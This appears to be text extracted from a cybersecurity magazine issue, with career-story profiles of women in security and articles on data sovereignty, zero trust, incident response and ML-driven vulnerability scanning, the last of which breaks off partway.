After some soul searching I resigned from my software engineering job to focus on cybersecurity. I applied for the Cybergirls 2.0 Fellowship run by the Cybersafe Foundation, and was selected. At the same time I landed a one-year internship in the ICT department of a government agency. It was a huge leap, but I knew it was the right choice. Balancing the internship with my training wasn’t easy. Sometimes I would be sent to remote areas for fieldwork where it was challenging finding a stable internet connection to attend virtual training. But I was determined to make it work.

The Cybergirls training gave me hands-on skills applicable to my internship role. I felt I was building my toolkit to tackle real-world security challenges. The confidence I gained from that training helped me start freelancing as a cybersecurity consultant after my internship ended.

While freelancing I launched a LinkedIn newsletter, The Cyber-Cop Hub, inspired by my father, who jokingly referred to me as a ‘cyber cop’ when we

discussed my goals. Writing the newsletter helped me share my learning, connect with cybersecurity professionals and strengthen my personal brand.

This was a period of learning and growth. I stayed positive, prayed and focused on building my brand. Cybersecurity is highly competitive. Standing out is crucial. Through resilience and hard work I eventually landed my first full-time role as a cybersecurity engineer in enterprise security.

I knew I needed mentors to continue growing, so I joined several programs, including Women in Security affiliate WiCySEastAfrica run by Strathmore University and Standard Chartered, and the Women in Cybersecurity program run by the International Telecommunication Union (ITU). These programs provided access to incredible mentors who expanded my perspective and encouraged me to explore my strengths.

One mentor, Restercuter Nyawira, pushed me to work on my public speaking skills. She encouraged me to

speak at technical sessions with local cybersecurity community SheHacks KE, and at industry events. These experiences boosted my confidence and led to opportunities to speak with cybersecurity students at universities across Kenya. I also became a cybersecurity instructor for a Rapid Tech Skills program, a flagship project under The Strengthening of Kenya’s Innovation and Entrepreneurship Ecosystem (SKIES), part of the Kenya Industry and Entrepreneurship Programme (KIE). The program is helping to shape the next generation of cybersecurity professionals, and my role was highly fulfilling.

Recently, I had the honour of speaking at Black Hat Middle East and Africa 2024, the region’s biggest cybersecurity conference. Held in Riyadh, Saudi Arabia, it brought together brilliant minds in the field. Sharing insights with such a diverse audience was a huge milestone and strengthened my commitment to advancing cybersecurity globally.

Throughout my journey I’ve worked with amazing people from different industries and this exposure has driven me to keep learning. I’ve earned certifications like Certified in Cybersecurity (CC) by (ISC)² and eLearnSecurity Junior Penetration Tester (eJPT) by INE. I’m preparing for more certifications to solidify my expertise.

Cybersecurity is full of challenges, and I thrive on them. Every day brings new problems to solve, whether I’m working with clients, vendor or C-suite executives. These experiences have made me a better communicator and problem-solver: skills crucial in this field.

Looking back, growth isn’t always linear. The past few years have been full of surprises—some good, some tough—but they’ve taught me resilience, adaptability and the importance of continuous learning. In cybersecurity, things are always changing. So staying curious and embracing new experiences is key.

If you’re considering a career switch or entering a competitive field, don’t be afraid to take risks and pivot when necessary. Your career isn’t just about

reaching a destination—it’s about the growth you experience along the way. Every challenge is a chance to learn and improve, and every step you take counts.

Building a personal brand and cultivating a professional network have been crucial in my journey. So, keep pushing forward, stay open to new opportunities and remember that every experience contributes to your growth. The future is full of possibilities for those who keep evolving and staying focused on their goals.

x.com/Watiri_bossbabe

www.instagram.com/afriqan_goddess

www.linkedin.com/in/mary-kambo

REBBECA ROBERTS

BEING THERE FOR THE CUSTOMER: FROM BUSINESS DEVELOPMENT ROOKIE TO CYBER SALES SPECIALIST

by Rebbeca Roberts , Regional Sales Manager - Australia & New Zealand at Exabeam

My focus on delivering value for clients and supporting a series of inspirational female leaders have helped me build a rewarding career in the enterprise space.

In common with many young people I had little idea of what my next move should be when high school ended. Cue the gap year, an experience which taught me, among many other life lessons, that I had an affinity for hard work and the rewards it can generate.

That insight prompted me to search for entry level openings in the sales sector, and when one came up at business intelligence vendor Talend I leapt at the chance. I liked working as a business development rep in London where its UK office was located, and I loved learning the ropes, booking appointments and absorbing as much as I could from my more experienced colleagues.

WOMEN EMPOWERING WOMEN

Two years later an unexpected redundancy saw me looking for work again and I found it with networking solutions vendor Brocade where I had the good fortune to be hired by an inspirational go-getting woman who was my boss for the next 18 months.

It’s wholly thanks to her that I got my start in cybersecurity. Shortly after she had moved on to a more senior role at Fortinet she got in touch to offer me an internal account manager position. I needed a little persuading to take it. Having been in her team previously I was willing to follow her lead wherever it took me, knowing I’d be learning from someone who was ambitious, experienced and smart. The fact that Fortinet was a larger company, and a higher profile brand, was also a bonus. And the role on offer would give me proximity to a first-class technical team, and a fun group of external salespeople.

Not long after joining Fortinet I was given the opportunity to attend some face-to-face client meetings and had the thrill of securing my first big sale, to Burberry, a sizeable account and a sizeable achievement for someone who was essentially still ‘just’ a BDR.

MOVING UP THE RANKS DOWN UNDER

A move to Australia in late 2016 meant looking for work again and, on this occasion, I found it at VMware. Once more I found myself working for and with a series of clever, committed women who were intent on rising to the top of what was, and remains, a male dominated industry. Developing a deep understanding of industry trends and the technologies we were working with while honing my enterprise sales skills helped me transform myself into someone who is able to build trusted, long-term client relationships and drive positive outcomes for organisations.

I’m continuing to do so at Exabeam, a global cybersecurity leader that delivers AI-driven security operations.

I came to the company in mid-2024 via experience at Trend Micro and then Ivanti, where I worked as an account and sales executive, and later director.

These progressively more senior roles enabled me to build connections with leaders and decision makers in some of the country’s largest businesses and organisations, and drive my career forward at a pace that has exceeded my expectations.

It’s difficult for me to overstate my gratitude to the women who’ve inspired and encouraged me on my journey from raw recruit to regional sales manager. Without their support, finding my feet and gaining confidence in what remains a somewhat arcane and heavily male dominated segment of the ICT sector would have been considerably more challenging, and far less enjoyable.

PROVIDING CLARITY AND VALUE

The most important lesson these trusted role models and mentors have taught me is that there’s a real place for cyber specialists who can cut through the noise and navigate a way forward by supplying clients with research, use cases and up-to-theminute insights.

Staying laser focused on advancing the interests of the businesses we serve rather than on short term rewards, along with my willingness to go the proverbial extra mile when trouble strikes, have helped me forge strong client bonds.

Whether it’s during office hours or at 6am on a Sunday morning, if things turn serious and my customers need clarity and support I’m happy to be their go-to person, not necessarily the person who can give them the answers, but absolutely the person who’ll make sure they get them, and fast.

SEIZING THE OPPORTUNITY

I’ve enjoyed almost every day I’ve spent in the cyber sector and, for my money, there’s no better space in which to work. If you’re a tenacious go-getter who relishes a challenge, there are opportunities aplenty for you to join us and make your mark.

www.linkedin.com/in/rebbeca-roberts-b2931014

ERIN GRIPPO

ALL THE DOORS THROUGH WHICH I’VE WALKED

by Erin Grippo, Senior Manager, Product Operations at Brivo

When I entered the security industry in the Northern Summer of 2016, I was a fresh graduate from DePauw University, a liberal arts school in Greencastle, Indiana. With my degree in Communications, I was ready to enter the professional world. With absolutely no idea what I wanted to do, or how I wanted to build my professional career, I eagerly accepted a role at Allegion, a supplier of electronic and mechanical security products, in channel marketing and began my now eight year tenure in the industry. As I reflect on the last eight years, I realise my journey has been quite non-linear, but I’ve benefitted from the versatility of roles and organisations that make our industry so multifaceted and exciting.

Across the three organisations I’ve worked for, I’ve had the pleasure of working in the United States, Canada and the United Kingdom, with varying degrees of regional, national and global responsibilities. I started my career in marketing and communications, which was the most challenging way to begin in the industry. It was very difficult to market products and services I hardly understood. However, I very quickly learnt that the industry is special: it’s made up of deeply experienced professionals who have spent 20, 30, 40+ years dedicating themselves to security and access control. Those professionals, both inside and outside the organisations I worked for, offered me guidance, knowledge and mentorship. They showed

me their roles, told me about their careers, and asked me what I wanted to do with mine.

LESSON NUMBER ONE FROM THE SECURITY INDUSTRY - IT’S EXCEPTIONALLY RELATIONSHIP BASED.

Building a strong network of supportive, trusted colleagues and industry peers has been my greatest advantage as a young professional.

My experience at Allegion was incredibly rewarding. I moved from working on the mechanical side of access control—locks and door hardware—to the electronic side of the business, technology partnerships and security solutions. From there, I moved deeper into the emerging technology space, focused on how ‘access control’ no longer meant allowing people to enter and exit spaces safely, but, rather, was the means of creating entire building ecosystems built around the human experience. Cool, right? I was immersed in different verticals and learning how the industry had to tailor its sales activities, storytelling, product development and marketing strategies to better align with the user experience. I loved it. However, after five and a half years and working for Allegion in two countries, I felt ready to jump to something new; an organisation in the industry that did things differently. Resigning from Allegion was not easy. I had loved the company

and the people I worked beside daily. But, despite the anxiety of not knowing whether I was making the right decision, I knew I needed to give this a try.

Joining smart access technology company Latch in 2021 gave me the opportunity to start over. I was no longer in marketing or partnerships, but in product operations, focused on expanding into the United Kingdom. That role was an intense departure from my comfort zone and skillset, but it exposed me to the critical and strategic elements of business: the decision-making processes behind the curtain. I learned how organisations weigh strategic priorities, create budgets, build financial goals, develop products, research the market and create corporate culture. I was with Latch for about 18 months only, but I had five roles because the organisation gave me a chance to explore different opportunities, and I was willing to take on different responsibilities. At Latch I got my Yellow Belt in Six Sigma, tried my hand at a sales position, built an entire channel enablement program, managed our Canadian business and ultimately landed a role in business operations.

LESSON NUMBER TWO OF THE SECURITY INDUSTRY: SAY YES TO ANY OPPORTUNITY, EVEN IF YOU’RE NOT FULLY PREPARED. THE CHANCE TO LEARN, GROW AND UPSKILL YOURSELF IS A GIFT.

However, things do not always work out as we had hoped. On a Monday in July of 2023, after a twoweek vacation, in the first 30 minutes of my day, I went from being anxious about the backlog of work from my time off, to being unemployed. I, like a lot of people, had been affected by a reduction in the workforce. I lost my job, after starting my new role only a few weeks earlier. I felt a deep sense of unease and uncertainty about what was next for me, and about what I wanted.

A few weeks into unemployment, in the midst of job applications and interview processes, I had a pivotal conversation with an industry colleague at Brivo. His question for me was simple: “What do you like to do and what do you want to do? Maybe there’s a fit at our organisation.” That kicked off a series of chats which made me realise the next few years of my career

were critical. If I aspired to a leadership role in the industry, I needed a stronger understanding of the business side of a company.

I’m now a year into my role as the senior manager of product operations at Brivo, and it’s been the most challenging role I’ve ever had, in the most rewarding way. I’ve noticed a curiosity for things I never thought twice about: pricing strategies and data privacy regulations. I’m asking more questions because I’m responsible for specific initiatives, and I need guidance. I’m thinking differently. I’m exposed to complex decision-making, and I am learning how to navigate and weigh information, timelines and organisational goals in order to make the best decisions for projects. And I’m proactively trying to close my skill gaps. I live in the world of data now; it’s time for me to take a data analytics course.

Eight years ago, I had no idea what I wanted to do with my career. Now, as a 31 year old, I’m excited because I still don’t know exactly what I want to do. But what I do know is that the industry continues to give me opportunities to explore new avenues, responsibilities and skillsets.

LESSON NUMBER 3 OF THE SECURITY INDUSTRY: WHEN ONE DOOR CLOSES, ANOTHER USUALLY OPENS. THAT’S HOW DOORS WORK.

And while those doors continue to open, I’ll continue to walk through them.

www.linkedin.com/erincmann

REYHAN USMAN

AN INSPIRING TALE OF RESILIENCE, FOCUS, AND DETERMINATION FROM AN IT PROFESSIONAL TRANSITIONING INTO CLOUD SECURITY

by Reyhan Usman , EOC Information Technology/Administrative Coordinator at eHealth Africa

WHAT’S HER JOURNEY: FINDING MY PATH IN CLOUD SECURITY

Navigating the tech industry is like traversing a vast, constantly changing landscape. It’s exciting and brimming with opportunities, but also filled with challenges that can test even the most determined individuals. My journey into cloud security has been one of perseverance, self-discovery and relentless pursuit of growth, despite the obstacles along the way.

THE CHALLENGE OF FINDING DIRECTION IN TECH

Starting out, the ever-expanding world of tech was both thrilling and overwhelming. With new technologies emerging every day, deciding where to

focus was one of my first hurdles. Should I pursue artificial intelligence? Ethical hacking? Data analytics? Cybersecurity eventually stood out because of its vital role in protecting systems and people in a digitalfirst world.

Even within cybersecurity, finding a niche was a challenge. I experimented with various disciplines— penetration testing, network security and even blockchain. But cloud security ultimately felt like the perfect fit, combining my interest in cutting-edge technology with the protection of dynamic, scalable infrastructures. Choosing to specialise meant sacrificing my exploration of other areas of interest, but it was a decision that gave my career clarity and direction.

THE HIRING DISCONNECT: BARRIERS TO ENTRY

One of the most frustrating realities of breaking into tech was the hiring disconnect for entry-level roles. Despite having hands-on experience, a solid educational background and multiple internships, I constantly encountered job descriptions requiring five or more years of experience for ‘junior’ positions. It was disheartening to see roles I knew I was capable of handling but could not apply for because I lacked the arbitrary years of experience or certifications listed as prerequisites. Even after earning my master’s degree in cybersecurity, I encountered this barrier repeatedly, forcing me to rethink my approach to entering the field.

THE HIGH COST OF CERTIFICATIONS

Another significant challenge was the financial burden of obtaining certifications. For someone starting out in Nigeria, certifications like AWS Certified Solutions Architect or CompTIA Security+ are essential for proving technical expertise, but their costs were often prohibitively high due to the instability of foreign exchange rates.

Balancing the cost of certifications with daily expenses meant months of planning and saving for each exam. Despite these challenges, I saw certifications as an investment in myself and my future, so I worked tirelessly to earn them one at a time. Each credential represented not just knowledge, but also the sacrifices I had made to acquire it.

NETWORKING AND MENTORSHIP: BUILDING A SUPPORT SYSTEM

Breaking into tech is not only about skills; it’s also about who you know and how well you can learn from others. Initially, I struggled with a lack of mentorship and networking opportunities, which made the journey feel isolating. However, my involvement in the Cybergirls Fellowship turned this around.

The Fellowship provided me with a support system of like-minded individuals and mentors who offered guidance, encouragement and practical advice. It was a pivotal moment in my career, helping me build confidence and a professional network that continues to support my growth.

OVERCOMING IMPOSTER SYNDROME AND FIERCE COMPETITION

Imposter syndrome was another hurdle I had to overcome. With so many talented candidates vying for limited positions, it was easy to doubt my abilities and question whether I belonged in such a competitive field.

However, I learnt to reframe my mindset. Instead of comparing myself to others, I focused on celebrating my progress and unique journey. I reminded myself that every skill I acquired and every certification I earned was proof of my capabilities. Over time, this shift in perspective allowed me to navigate the competitive job market with greater resilience and confidence.

TRANSITIONING FULLY TO CLOUD SECURITY

While I currently balance roles in IT administration and cloud security, my goal is to transition fully into a dedicated cloud security role. This requires me to deepen my technical expertise and share my experiences to inspire others breaking into the cybersecurity industry.

By continuing to write about my journey, I hope to shed light on the realities of entering tech—both the challenges and the rewards. I want to show others that, while the path may be difficult, it is also incredibly fulfilling.

LESSONS LEARNT ON MY JOURNEY

Reflecting on my journey, a few key lessons emerge:

1. Tech is vast, but finding a niche allows you to build depth and expertise that make you stand out.

2. Invest in yourself: Certifications and training are worth the time and effort, even when the financial burden feels heavy, but practical, handson skills are more important.

3. Surrounding yourself with supportive mentors and peers can make all the difference (community is everything). As one of my mentor’s rightfully said, “we rise by lifting others”.

4. There will always be challenges, but persistence and adaptability are crucial for overcoming them.

RISING THROUGH RESILIENCE

My journey into cloud security has been shaped by challenges—financial hurdles, hiring disconnects, imposter syndrome—but it has also been defined by resilience and growth. Each obstacle I’ve faced has taught me valuable lessons about the importance of focus, community and perseverance.

As I look ahead to the next phase of my career, I remain committed to pushing boundaries, breaking barriers and inspiring others to do the same. The path to success in tech may not be easy, but it is undoubtedly worth the effort required to travel it.

www.linkedin.com/in/cyberrey

www.youtube.com/@reyincyber

github.com/reyincyber

cyberrey.medium.com

Let Us Join Your Team Now !!!

"Get skilled support to fill your team’s gaps at the same wage rate.

Source2Create provides a team of professionals across marketing, social media, admin, and content management, ready to enhance productivity without adding strain to your budget."

DO YOU CURRENTLY HAVE ANY OF THE FOLLOWING REMOTE OPEN POSITIONS?

Marketing support

Marketing strategy

Event coordinators/managers

Telemarketers

Linkedin/Instagram managers

Admin support

Canva ad creators

Wordpress content administrator

Admin and Data Entry

SCHEDULE A CALL TODAY OR EMAIL ABY

ABY@SOURCE2CREATE.COM.AU

TECHNOLOGY PERSPECTIVES

PAMEELA GEORGE

FROM ASHES TO POWER: THE PHOENIX OF DATA SOVEREIGNTY RISES

by Pameela George , Customer Service Assistant - Carrolls Irish Gifts

In today’s digital landscape a new dawn of data sovereignty is emerging. Our world, once marked by the free flow of data across borders, is now witnessing a resurgence of national control, a rebirth akin to the phoenix rising from its ashes. Countries are reclaiming authority over the data generated within their borders, transforming it into a force of empowerment, security and innovation. For international AI companies this shift requires resilience and adaptation as they navigate the challenges posed by data localisation policies. This new age of sovereignty is both a trial and an opportunity demanding transformation that fuels growth and strengthens digital security.

THE RISE OF DATA SOVEREIGNTY: A REBIRTH OF CONTROL

Data sovereignty reflects a nation’s desire to safeguard its digital assets, much like a phoenix rising anew, carrying forward the essence of its former self. Localisation policies mandate that data collected within a country’s borders remains stored and processed there, igniting a powerful movement to protect national security, economic interests

and privacy. From the European Union to India, governments are increasingly asserting control over digital resources, reshaping the rules of engagement for companies operating internationally.

This resurgence isn’t just about protecting data, it’s about reclaiming power in a globalised world. Countries like India, China and Brazil have initiated strict localisation rules to prevent data exploitation by foreign entities, bringing data sovereignty to the forefront of digital policy. In a world where data has become the lifeblood of innovation, this resurgence signals a monumental shift.

TRIALS BY FIRE: AI COMPANIES IN A NEW REGULATORY ERA

For international AI companies, data sovereignty policies present a huge challenge. Adhering to localisation requirements is costly and complex, demanding infrastructure investments such as local data centres, and jurisdiction-specific data handling practices. These companies must reinvent their strategies and adapt to fragmented data rules without compromising their innovation edge. Like the phoenix,

they are reshaping themselves in the face of these fiery trials, building resilience and fostering trust among global consumers.

The EU’s General Data Protection Regulation (GDPR) and India’s Digital Personal Data Protection (DPDP) Act embody this new age of regulation. GDPR, one of the world’s most stringent data protection laws, mandates that data transferred outside the EU meet ‘adequacy’ standards that ensure comparable protection in the receiving country. Companies like Uber have faced steep fines for breaching these requirements, underscoring the financial and operational risks of non-compliance. The €290 million penalty imposed on Uber for unauthorised data transfers highlights the consequences of failing to adhere to GDPR’s rigorous standards and serves as a reminder of the fire that companies must pass through to comply with these reborn data norms.

INDIA’S DPDP ACT: A PHOENIX OF SOVEREIGNTY IN EMERGING ECONOMIES

In emerging markets like India, data sovereignty takes on unique importance, symbolising a

resurgence of control. India’s DPDP Act enforces data localisation and restricts cross-border transfers of sensitive data to ensure national security and economic idependence.

This rebirth of sovereignty over data presents both a challenge and an opportunity for AI companies seeking to harness the vast potential of India’s diverse digital market. For these companies, the DPDP Act’s requirements translate into a need for domestic storage solutions and local compliance strategies, adding costs but also embedding trust among Indian consumers. Just as the phoenix rises stronger after each rebirth, AI companies that succeed in complying with the DPDP Act’s standards emerge as trusted and resilient players, capable of navigating complex regulatory landscapes.

INNOVATION THROUGH RESILIENCE: A BALANCING ACT

The push for data sovereignty creates a delicate balance between national security and innovation. Localisation policies may restrict data flows, creating ‘data silos’ that limit the scope of machine learning

and predictive algorithms. However, these constraints also drive innovation in data management and AI design, pushing companies to adapt creatively. By developing local solutions and aligning their operations with regional regulations, AI companies are reborn as champions of compliance and trust.

In response, some regions are exploring controlled data-sharing frameworks, like the EU-US Data Privacy Framework, to maintain the benefits of cross-border data access while respecting sovereignty. These collaborations symbolise the phoenix’s ascent, a striving for a world where nations and companies alike can protect data privacy while fostering global innovation.

A VISION OF COLLABORATION AND SOVEREIGNTY

The future of data sovereignty lies in collaborative frameworks that honour each nation’s unique needs while enabling the interconnectedness essential to digital progress. As governments recognise the value of a globally connected ecosystem, new standards for data sharing will arise offering a harmonious path between privacy, security and innovation. GDPR and the DPDP Act set foundational precedents, but a united approach that respects both sovereignty and the power of a connected digital world will define the next era.

A PHOENIX RISEN, READY FOR THE FUTURE

The resurgence of data sovereignty is a powerful movement in the digital age, representing a rebirth of control, security and innovation. Just as the phoenix rises anew, countries and companies are reshaping themselves in response to evolving data policies. This transformative journey signals the dawn of a new, resilient digital world; one where nations protect their citizens’ privacy and in which AI companies rise to the challenge, building a future of trust and security across borders.

ABOUT PAMEELA GEORGE

Pameela George is a multifaceted professional with expertise spanning law, marketing, sales, retail, and content creation. With a unique ability to synthesize insights from diverse industries, she specializes in privacy law and AI-driven solutions, crafting forward-thinking strategies and thought leadership. Recognised for her published works and dynamic approach, Pameela aims to drive innovation and clarity in an ever-evolving digital landscape.

ANITA NNAMDI

MODERN CYBERSECURITY: BUILDING A RESILIENT DEFENCE

by Anita Nnamdi , SOC Analyst

In today’s digital world cybersecurity professionals face an evolving landscape of threats that demand both innovation and vigilance. Yet, as tools and technologies advance, it’s easy to get lost in buzzwords and trends. What are the real gamechangers in security technology today? How can organisations integrate them effectively to build a resilient defence?

This article delves into the technologies shaping the future of cybersecurity and provides actionable steps to implement them.

1. EMBRACING ZERO TRUST: A DYNAMIC APPROACH TO ACCESS CONTROL

Zero trust is no longer a buzzword, it’s a fundamental shift in how access control is managed. Unlike traditional models, zero trust operates on the principle of ‘never trust, always verify’. Every access request is scrutinised in real-time using contextual factors such as user identity, device health and location.

For example, a financial institution may implement zero trust to ensure that even employees on the

corporate network cannot access sensitive data without multifactor authentication and device compliance. By piloting zero trust policies on critical applications first, organisations can minimise disruptions while testing its effectiveness.

Key implementation tip: start by mapping your network to identify sensitive assets and apply zero trust policies incrementally. Deploy robust identity verification mechanisms, such as biometric authentication or hardware tokens, to enhance security without hampering usability.

2. THE RISE OF AI IN THREAT DETECTION

Artificial intelligence (AI) and machine learning (ML) are transforming threat detection by moving it beyond signature-based methods. AI analyses vast datasets to detect patterns and anomalies that human analysts might miss. For example, AI tools like IBM QRadar or Darktrace can spot insider threats by identifying unusual access patterns or abnormal file transfers.

In one case a healthcare provider used AI to detect ransomware early by analysing deviations in network

traffic, preventing an attack before it could encrypt critical patient data.

Key implementation tip: choose AI tools that integrate seamlessly with your existing infrastructure. Train your team to interpret AI-generated insights effectively, ensuring that the technology complements human expertise rather than overwhelming it with data.

3. STRENGTHENING CLOUD SECURITY FOR HYBRID ENVIRONMENTS

With organisations increasingly adopting hybrid cloud models, securing data and applications across multiple environments has become paramount. Cloud security tools such as cloud security posture management (CSPM) and container security solutions offer comprehensive protection.

Take the example of a retail organisation managing customer data on both on-premises servers and cloud platforms. By implementing robust identity and access management (IAM) policies the company

ensured employees could access only the specific resources they need, reducing exposure to breaches.

Key implementation tip: regularly audit cloud configurations and ensure encryption of data in transit and at rest. Adopt tools that offer visibility across hybrid environments, enabling quick identification and resolution of vulnerabilities.

4. AUTOMATING SECURITY WITH SOAR PLATFORMS

Security orchestration, automation and response (SOAR) platforms are invaluable for overburdened security teams dealing with ‘alert fatigue’. These platforms automate repetitive tasks such as isolating compromised endpoints or updating firewall rules, allowing teams to focus on complex threats.

For example, a manufacturing firm used SOAR to streamline incident response, reducing average response times from hours to minutes by automating low-level alerts.

Key implementation tip: start by automating predictable tasks such as resetting compromised user credentials. Gradually expand the scope of automation to include more complex workflows like coordinated responses across multiple systems.

5. PRACTICAL STEPS TO INTEGRATE THESE TECHNOLOGIES

Adopting advanced security technologies requires careful planning and execution. Here are actionable steps to ensure successful integration.

• Conduct a comprehensive risk assessment: identify high-priority areas where these technologies can have the most impact, such as protecting sensitive data or securing remote access.

• Activate advanced features in existing tools: many tools, such as Check Point or Fortigate firewalls, already support advanced functionalities like automated threat response. Enabling these features can enhance security without requiring additional investment.

• Upskill your team: technology is only as effective as the people managing it. Focus on targeted training programs to help your team master newly implemented tools, ensuring they can maximise their potential.

REAL-WORLD EXAMPLES: INNOVATION IN ACTION

These technologies are already making waves across industries.

1. Healthcare: a hospital leveraged AI to detect phishing attempts targeting its staff, reducing successful breaches by 70 percent.

2. Retail: a major e-commerce platform used zero trust to secure customer data, ensuring compliance with global privacy regulations.

3. Finance: a bank adopted SOAR to automate fraud detection leading to faster resolution times and improved customer trust.

THE TAKEAWAY: ADAPTATION IS KEY

Cybersecurity is an ever-evolving field and staying ahead of threats requires both technological innovation and adaptability. By embracing zero trust, AI, cloud security and automation organisations can build proactive defences that address current risks while preparing for future challenges.

Next steps: begin with a small pilot project such as AI-driven threat detection and measure its impact. Use those results to scale your efforts, ensuring that each new technology adds measurable value.

By fostering a culture of continual learning and strategic implementation security teams can navigate the complexities of the digital world with confidence and resilience.

ABOUT AUTHOR

Anita Nnamdi is a passionate network and cybersecurity professional with a proven track record in building secure, resilient systems for organisations of all sizes. I focus on innovation and strategic problem solving, and I am dedicated to empowering businesses to stay ahead of evolving cyber threats while promoting diversity and inclusion within the industry.

www.linkedin.com/in/anita-nnamdi-i12/

EFFECTIVE INCIDENT RESPONSE AND RECOVERY ELEMENTS

by Marise Alphonso , Information Security Professional

What does it take for an organisation to return to normal operations after experiencing a securityrelated incident or crisis? Foundational aspects, documented in an incident response plan and practiced so the specified activities and actions become muscle memory are key.

A favoured approach to security incident response, as defined by the National Institute of Standards and Technology, is shown in Figure 1: Incident Response Life Cycle.

(Source: Computer Security Incident Handling Guide, https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST. SP.800-61r2.pdf)

MARISE ALPHONSO

Figure 1: Incident Response Life Cycle

The preparation phase of incident response encompasses several security practices that an organisation must have in place to facilitate effective recovery in the event of a security incident. Key aspects that must be considered, discussed and documented include: incident response team member contact details, communication mechanisms to be used (and alternates that would be required if the primary mechanism is impacted), toolsets for incident tracking and documentation, external assistance retainers for digital forensics and cyber insurance, organisational network and system architecture topology diagrams and standby devices for emergency use.

As shown in figure 1, Incident response activities are not entirely linear. Depending upon the type of incident they could require iterations between the detection and analysis phase and the containment, eradication and recovery phase. Two security incidents I was involved in demonstrated exactly this non-linearity and highlighted for me that a postincident ‘lessons learnt’ exercise is critical to creating a feedback loop that leads to improvements in the preparation phase.

Incident One (December 2018) involved a colleague’s Microsoft 365 email account being compromised and used to solicit iTunes gift cards from their email contacts. This compromise was made possible because multifactor authentication (MFA) was not deployed on the account at the time, but it was not clear how the account password had been compromised. It may have been via a man-in-themiddle attack on an insecure open WiFi network. A fellow colleague, having received the iTunes gift card email, was quick to check in with the email account owner to verify the authenticity of the email. When it was found to be spurious, access to the account was immediately blocked and the password changed.

An investigation began in which Microsoft logs were reviewed to determine how access might have been obtained and identify any additional unauthorised actions. This investigation revealed that the mailbox also held client spreadsheet files containing information of a personal nature. This was immediately a red flag due to reporting obligations under the Notifiable Data Breach scheme of the Australian Privacy Act (1988). While the organisation did not have a formal, documented incident response

process at the time, there was sufficient knowledge in the incident response team to determine whether this was a breach that had to be notified to affected individuals and the Office of the Australian Information Commissioner, under the requirements of the Notifiable Data Breach scheme. A considered assessment of the risk of serious harm, based on the affected personal information, was made and it was determined that the risk was low.

KEY LESSONS:

• Enable multifactor authentication. This is critically important for all user accounts with access to information of a sensitive or critical nature.

• Configure logging. Determine the minimum requirements for logging events on your key IT systems and applications.

• Understand compliance requirements. Know the information security and data protection obligations imposed on your industry and sector.

• Promote awareness of prevalent threats. Communicate threats to employees across the organisation.

Incident Two (December 2021) occurred when the organisation’s outsourced security operations centre (SOC) analysts noticed an indicator of compromise for the Log4j vulnerability on an organisational IT system. Apache Log4j is an open-source java logging library used in thousands of software products from hundreds of vendors. This compromise (with a CVSS rating of 10) could have allowed malicious actors to take control of IT systems or networks. An incident ticket was opened and, upon review by the internal team, it was noted that the affected system had been updated to a recent version of Log4j. However, the compromise may have happened before the update was performed. The impacted IT system held customer information that could have been accessed. Collaboration between the SOC and the internal team over several days ensued, during which an extract of server logs was reviewed to ascertain the actions taken by the malicious actor. It was determined that no sensitive information had been accessed, and the IT system was rebuilt to eradicate any potential backdoors that may have been installed.

KEY LESSONS:

• Consider procuring the services of a SOC. The benefit of having experts look over IT systems events 365x24x7 for any indicators of compromise cannot be overstated.

• Subscribe to threat intelligence feeds. These will provide an indication of prevalent threats that may impact your organisation or your third parties.

• Enable logging. In the event of a compromise, determining the actions taken by malicious actors is critical to the development of a suitable response.

• Define asset inventories. Documenting IT systems and vendor inventories is key to providing a list of potentially impacted systems and of vendors who need to be communicated with as part of the incident response process.

• Formalise your incident response team. Ensure the roles and responsibilities of an incident response team are established to facilitate internal collaboration in the event of an incident.

The internal team in both Incident One and Incident Two had performed foundational steps as part of the preparation phase of incident response. However, improvements were identified during the post incident activity. Effective recovery from a security incident requires attention be paid to each phase of the response process. Preparation is the ultimate key to recovery and resurgence.

www. linkedin.com/in/marisealphonso

BY AUSTRALIAN AUTHOR CRAIG FORD

THE FUTURE OF AUTOMATED VULNERABILITY SCANNING

by Florence Kabona, Penetration tester

REVOLUTIONISING CYBERSECURITY

In the dynamic world of cybersecurity, every moment brings a new idea, a phoenix arising from the ashes of challenging times. The adoption of ML and AI tools in automated vulnerability scanning is considered one of the most massive gamechangers in the cybersecurity world. These technologies are not only facilitating smoothness but are entirely changing the way threat defence is being undertaken, creating a revival in the fight against the onslaught of cyber threats.

Remember how penetration testing used to be about messy, manual processes? Well, we are at the dawn of a new world of smooth automation, thanks to some really cool self-adjusting tools set to make digital defence much more effective and accessible. They represent a fresh start in scanning for vulnerabilities, stretching the limits of what we can do.

PENETRATION TESTING GETS REIMAGINED WITH ML-POWERED TOOLS

Traditional penetration testing has been effective, but often it depended on several different tools, each designed to find a specific type of attack, such as

SQL injection or cross-site scripting, or a specific weakness, such as an insecure configuration. They required a tester to juggle several tools, often wasting a lot of time and effort.

The rise of machine learning provides the cybersecurity industry with an opportunity to emerge stronger from these limitations. Imagine an innovative, integrated tool using ML to identify vulnerabilities and rank risks, rate the feasibility of specific exploits and predict new attacks. It would be like a phoenix rising from the ashes, taking the power of what we had learnt previously and mixing it with the speed and vision we need for what’s coming next. Some of these new tools, like OpenVAS, already do some automation, but get better with the introduction of ML that learns from large volumes of data and dynamically adapts to new vulnerabilities.

This whole shift to ML-powered tools is going to be a gamechanger for penetration testing. Workflows will be easier and mundane tasks will be taken over, which means cybersecurity professionals will be able to focus their time and energy on more

FLORENCE KABONA

elaborate mitigation strategies and on enhancing general security.

EMPOWERING EVERYDAY USERS

While this will surely greatly enhance the work of penetration testers and other security professionals it will also benefit others. Regular users, usually poorly or not at all protected and generally less aware of the dangers lurking in cyberspace, will be empowered through these new technologies.

ML-powered tools will create a shield for nontechnical users by powering websites that offer scanning for phishing or malware and warn users in advance against scams. They can flag suspicious websites and activities, adding an extra layer of protection previously available only from experts. With all the tools at their disposal, users are no longer sitting ducks but become very active participants in keeping themselves safe online.

These capabilities could expand to observing personal devices for suspicious activities, informing users about impending breaches and advising them how to mitigate such risks. Democratisation of cybersecurity expertise, enabled by ML, would make for a safer online ecosystem and bridge the gap between technical expertise and public availability.

MACHINE LEARNING AND THE EVOLUTION OF THREAT LANDSCAPES

Meanwhile, the threat actors are become more cunning, and the good old signature-based detection hardly keeps pace. That’s where ML-based tools come in handy. They learn from past attacks. They can anticipate and deliver on-the-fly identification of new vulnerabilities.

Much as the phoenix rises renewed from the ashes, so does ML help cybersecurity tools evolve on-the-go, always improving and adjusting to the ever-changing landscape of threats.

